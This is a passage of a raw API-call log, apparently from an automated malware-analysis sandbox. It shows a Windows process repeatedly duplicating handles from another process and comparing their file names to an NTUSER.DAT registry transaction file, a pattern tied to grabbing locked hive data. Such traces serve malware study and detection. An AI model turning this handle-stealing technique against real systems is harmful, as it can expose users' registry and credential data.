lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.705] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.705] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.705] CloseHandle (hObject=0x670) returned 1 [0154.705] CloseHandle (hObject=0x680) returned 1 [0154.705] CloseHandle (hObject=0x62c) returned 1 [0154.706] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.706] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.706] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.706] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.707] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.707] CloseHandle (hObject=0x670) returned 1 [0154.707] CloseHandle (hObject=0x680) returned 1 [0154.707] CloseHandle (hObject=0x62c) returned 1 [0154.707] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.707] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.707] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.708] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.710] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.710] CloseHandle (hObject=0x670) returned 1 [0154.710] _wcsicmp (_Str1="\\tmp.edb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0154.710] CloseHandle (hObject=0x680) returned 1 [0154.710] CloseHandle (hObject=0x62c) returned 1 [0154.711] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.711] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x480, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.711] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.711] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.712] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.712] CloseHandle (hObject=0x670) returned 1 [0154.712] _wcsicmp (_Str1="\\SCHEDLGU.TXT", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.712] CloseHandle (hObject=0x680) returned 1 [0154.712] CloseHandle (hObject=0x62c) returned 1 [0154.712] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.712] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x498, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.712] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.713] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.714] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.714] CloseHandle (hObject=0x670) returned 1 [0154.714] CloseHandle (hObject=0x680) returned 1 [0154.714] CloseHandle (hObject=0x62c) returned 1 [0154.714] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.714] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x49c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.714] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.715] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.715] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.715] CloseHandle (hObject=0x670) returned 1 [0154.715] _wcsicmp (_Str1="\\atsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.715] CloseHandle (hObject=0x680) returned 1 [0154.715] CloseHandle (hObject=0x62c) returned 1 [0154.715] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.715] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.715] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.716] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.717] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.717] CloseHandle (hObject=0x670) returned 1 [0154.717] _wcsicmp (_Str1="\\Tasks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0154.717] CloseHandle (hObject=0x680) returned 1 [0154.717] CloseHandle (hObject=0x62c) returned 1 [0154.717] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.717] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.717] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.718] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.718] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.719] CloseHandle (hObject=0x670) returned 1 [0154.719] _wcsicmp (_Str1="\\atsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.719] CloseHandle (hObject=0x680) returned 1 [0154.719] CloseHandle (hObject=0x62c) returned 1 [0154.719] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.719] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.719] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.720] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.721] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.721] CloseHandle (hObject=0x670) returned 1 [0154.721] _wcsicmp (_Str1="\\atsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.721] CloseHandle (hObject=0x680) returned 1 [0154.721] CloseHandle (hObject=0x62c) returned 1 [0154.721] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.721] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.721] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.721] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.722] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.722] CloseHandle (hObject=0x670) returned 1 [0154.722] CloseHandle (hObject=0x680) returned 1 [0154.722] CloseHandle (hObject=0x62c) returned 1 [0154.723] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.723] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.723] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.723] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.724] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.724] CloseHandle (hObject=0x670) returned 1 [0154.724] CloseHandle (hObject=0x680) returned 1 [0154.724] CloseHandle (hObject=0x62c) returned 1 [0154.724] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.724] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.724] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.725] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.726] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.726] CloseHandle (hObject=0x670) returned 1 [0154.726] _wcsicmp (_Str1="\\CatalogChangeListener-370-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0154.726] CloseHandle (hObject=0x680) returned 1 [0154.726] CloseHandle (hObject=0x62c) returned 1 [0154.726] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.726] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.726] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.727] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.727] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.727] CloseHandle (hObject=0x670) returned 1 [0154.727] CloseHandle (hObject=0x680) returned 1 [0154.727] CloseHandle (hObject=0x62c) returned 1 [0154.727] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.728] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.728] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.728] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.729] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.729] CloseHandle (hObject=0x670) returned 1 [0154.729] CloseHandle (hObject=0x680) returned 1 [0154.729] CloseHandle (hObject=0x62c) returned 1 [0154.729] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.729] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x520, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.729] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.730] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.731] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.731] CloseHandle (hObject=0x670) returned 1 [0154.731] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.731] CloseHandle (hObject=0x680) returned 1 [0154.731] CloseHandle (hObject=0x62c) returned 1 [0154.731] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.731] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.731] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.731] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.732] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.732] CloseHandle (hObject=0x670) returned 1 [0154.732] _wcsicmp (_Str1="\\MOF", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.732] CloseHandle (hObject=0x680) returned 1 [0154.732] CloseHandle (hObject=0x62c) returned 1 [0154.732] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.732] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x68c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.732] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.733] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.734] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.734] CloseHandle (hObject=0x670) returned 1 [0154.734] CloseHandle (hObject=0x680) returned 1 [0154.734] CloseHandle (hObject=0x62c) returned 1 [0154.734] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.734] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x788, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.734] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.735] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.735] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.735] CloseHandle (hObject=0x670) returned 1 [0154.736] CloseHandle (hObject=0x680) returned 1 [0154.736] CloseHandle (hObject=0x62c) returned 1 [0154.736] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.736] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.736] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.736] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.737] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.737] CloseHandle (hObject=0x670) returned 1 [0154.737] CloseHandle (hObject=0x680) returned 1 [0154.737] CloseHandle (hObject=0x62c) returned 1 [0154.737] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.737] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.737] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.738] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.738] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.739] CloseHandle (hObject=0x670) returned 1 [0154.739] CloseHandle (hObject=0x680) returned 1 [0154.739] CloseHandle (hObject=0x62c) returned 1 [0154.739] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.739] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.739] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.739] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.740] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.740] CloseHandle (hObject=0x670) returned 1 [0154.740] CloseHandle (hObject=0x680) returned 1 [0154.740] CloseHandle (hObject=0x62c) returned 1 [0154.740] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.740] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.740] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.741] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.741] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.742] CloseHandle (hObject=0x670) returned 1 [0154.742] CloseHandle (hObject=0x680) returned 1 [0154.742] CloseHandle (hObject=0x62c) returned 1 [0154.742] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.742] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x8fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.742] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.742] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.743] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.743] CloseHandle (hObject=0x670) returned 1 [0154.743] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.743] CloseHandle (hObject=0x680) returned 1 [0154.743] CloseHandle (hObject=0x62c) returned 1 [0154.743] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.743] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x954, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.743] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.744] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.745] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.745] CloseHandle (hObject=0x670) returned 1 [0154.745] _wcsicmp (_Str1="\\MAPPING1.MAP", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.745] CloseHandle (hObject=0x680) returned 1 [0154.745] CloseHandle (hObject=0x62c) returned 1 [0154.745] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.745] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x958, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.745] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.746] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.748] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.748] CloseHandle (hObject=0x670) returned 1 [0154.748] _wcsicmp (_Str1="\\MAPPING2.MAP", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.748] CloseHandle (hObject=0x680) returned 1 [0154.748] CloseHandle (hObject=0x62c) returned 1 [0154.748] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.748] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x95c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.748] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.749] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.750] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.750] CloseHandle (hObject=0x670) returned 1 [0154.750] _wcsicmp (_Str1="\\MAPPING3.MAP", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.750] CloseHandle (hObject=0x680) returned 1 [0154.750] CloseHandle (hObject=0x62c) returned 1 [0154.750] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.750] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x960, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.750] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.752] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.752] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.752] CloseHandle (hObject=0x670) returned 1 [0154.752] _wcsicmp (_Str1="\\OBJECTS.DATA", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 1 [0154.752] CloseHandle (hObject=0x680) returned 1 [0154.752] CloseHandle (hObject=0x62c) returned 1 [0154.753] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.753] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x964, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.753] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: 